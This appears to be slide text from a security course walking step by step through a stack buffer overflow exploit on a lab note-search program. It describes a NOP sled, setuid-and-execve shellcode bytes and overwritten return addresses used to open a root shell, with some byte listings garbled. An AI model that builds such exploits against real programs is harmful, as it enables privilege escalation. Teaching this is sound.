Buffer Overflow Walk-Through

The Code

Change name of notesearch program in our exploit code to match course naming convention bettersearchnote.exe 16 strcpy(command, “./bettersearchnote.exe\’”);

Change name of notesearch program in our exploit code to match course name in convention Need to change source code picture with correct file name

Normally, Jose runs bettersearchnote program to search for notes with keywords of his choosing Need to change source code picture with correct file name jose@EC310-VM $ ./ bettersearchnote.exe “Life” Life is Beautiful

The exploit program is crafted to run the program on his behalf, using the function “system()” Need to change source code picture with correct file name Verify unix_basics thing For example system(“ls”) would list the content of the current directory as though it was run from the command line jose@EC310-VM $ ls unix_basics booksrc work desktop ec310code } like this except no one ever enters this at the command prompt

#include… int main() { system(“ls”); } The exploit program is crafted to run the program on his behalf, using the function “system()” system_example.c #include… int main() { system(“ls”); } Need to change source code picture with correct file name jose@EC310-VM $ ./system_example.exe unix_basics booksrc work desktop ec310code

Now, lets look at what the exploit program does… Standard inclusion of C libraries

The goal of our exploit program is to open a root shell This is machine language that opens a shell prompt for the user running the program

First, the set-up… This is the standard way to start a program and take in command line arguments… But you already knew that

Building the stack… These lines declare the variables to be used in the program Address buffer command Address Variables are placed on the stack for the main function Integer offset 270 Integer ret ptr Address Integer i

Allocating memory on the heap for our string command, which will be called by the function system() . Allocates 200 bytes on the heap for the string command 0x__ 200 Bytes The address of this location on the heap becomes the value of the pointer command buffer command &command offset 270 This string will eventually be run with the function system() ret ptr i

Allocating memory on the heap for our string command, which will be called by the function system(). The bzero function places 200 0x00’s starting at the location to which command points 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 200 Bytes buffer command &command offset 270 ret ptr i

Building the String command This copies the string “./bettersearchnote.exe ‘“ into the location pointed to by the pointer command 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 . / b e t t e r s e a r c h n o t e . e x e ‘ 00 00 00 00 00 00 00 00 buffer command &command offset 270 ret ptr i

Add this to the address pointed to by the variable command Next we need to find the address where the command line arguments for bettersearchnote will start! This string will eventually overflow the bettersearchnote buffer, have the program execute our malicious code, and open a shell Take the number of bytes in the current string command, until the null terminator (24 bytes). Add this to the address pointed to by the variable command and store that address in the pointer buffer. . / b e t t e r s e a r c h n o t e . e x e ‘ 00 00 00 00 00 00 00 00 24 Bytes + buffer command &command &command offset 270 ret ptr i

Specifying our custom return address . / b e t t e r s e a r c h n o t e . e x e ‘ 00 00 00 00 00 00 00 00 This takes the command line argument to create our own custom offset value, but it is not used. buffer &command+24 command &command offset 270 ret ptr i

Specifying our custom return address This takes the address of i and subtracts the value of offset. This value is placed in the variable ret . / b e t t e r s e a r c h n o t e . e x e ‘ 00 00 00 00 00 00 00 00 , this value represents the address of our desired shell code execution entry point. buffer &command+24 - 270 command &command offset 270 ret ptr &i i

And place enough copies of our custom return address in the buffer to overwrite the original return address. . / b e t t e r s e a r c h n o t e . e x e . ‘ 00 00 00 00 00 00 00 00 Takes the address contained in ret and places it in the address pointed to by the buffer. This repeats every 4 bytes for 40 iterations. buffer &command+24 command &command offset 270 &i - 270 &i - 270 ret &i-270 &i - 270 ptr i

Now the entire heap looks like this . / b e t r s a c h n o x   ' &i-270 0x00 Now the entire heap looks like this

Next create a buffer of filler commands, called NOPs, to help find the shell code . / b e t t e r s e a r c h n o t e . e x e . ‘ &I - 270 &I - 270 &i - 270 ret 0x I – addr - 270 memset() sets a byte in memory to the value specified. In this case it puts the value 0x90 in the address pointed to by the buffer and into the next 59 addresses as well. 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 buffer &command+24 command &command 0x90 is machine code for “No Operation,” Which literally means do nothing. offset 270 ret &i-270 ptr i

Now the entire heap looks like this . / b e t r s a c h n o x   ' 0x90 &i-270 0x00 Now the entire heap looks like this NOP sled

Then place our shell code into the buffer immediately following the NOPs . / b e t t e r s e a r c h n o t e . e x e . ‘ 0x90 0x90 0x90 0x90 ret 0x I – addr - 270 buffer &command+24 command &command Copies the shell code into memory after the NOP sled offset 270 ret &i-270 ptr i

Now the entire heap looks like this . / b e t r s a c h n o x   ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 0x00 Now the entire heap looks like this With the newly inserted shell code here

. / b e t r s a c h n o x   ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 0x00 . / b e t r s a c h n o x   ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 0x00 Close the string command with a quote so it is ready to be run by the function system() Concatenates a single quote at the end of the string command ‘

Now the string command is finished and ready for execution. / b e t r s a c h n o x   ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 ‘ 0x00 Now the string command is finished and ready for execution. jose@EC310-VM $ ./bettersearchnote.exe ‘\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe2\x53\x89\xe2\x53\x89\xe1\xcd\x80\x80\x&i-270\x&i-270 \x&i-270\ x&i-270\ x&i-270\ x&i-270 \ x&i-270 \ x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 \x&i-270 ’

100 characters allotted to searchstring by bettersearchnote.exe exploit_notesearch . / b e t r s a c h n o x   ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 ‘ 0x00 . / b e t r s a c h n o x   ' 0x90 0x31 0xc0 0xc9 0x99 0xb0 0xa4 0xcd 0x80 0x6a 0x0b 0x58 0x51 0x68 0x2f 0x73 0x62 0x69 0x6e 0x89 0xe3 0xe2 0x53 0xe1 partial ret &i-270 ‘ 0x00 searchstring fd printing user id sfp return address bettersearchnote.exe   100 characters allotted to searchstring by bettersearchnote.exe exploit_notesearch command buffer contains 184 bytes, so it writes 84 bytes beyond the end of searchstring’s allotted space. Ensuring one of our custom return addresses replaces the original return address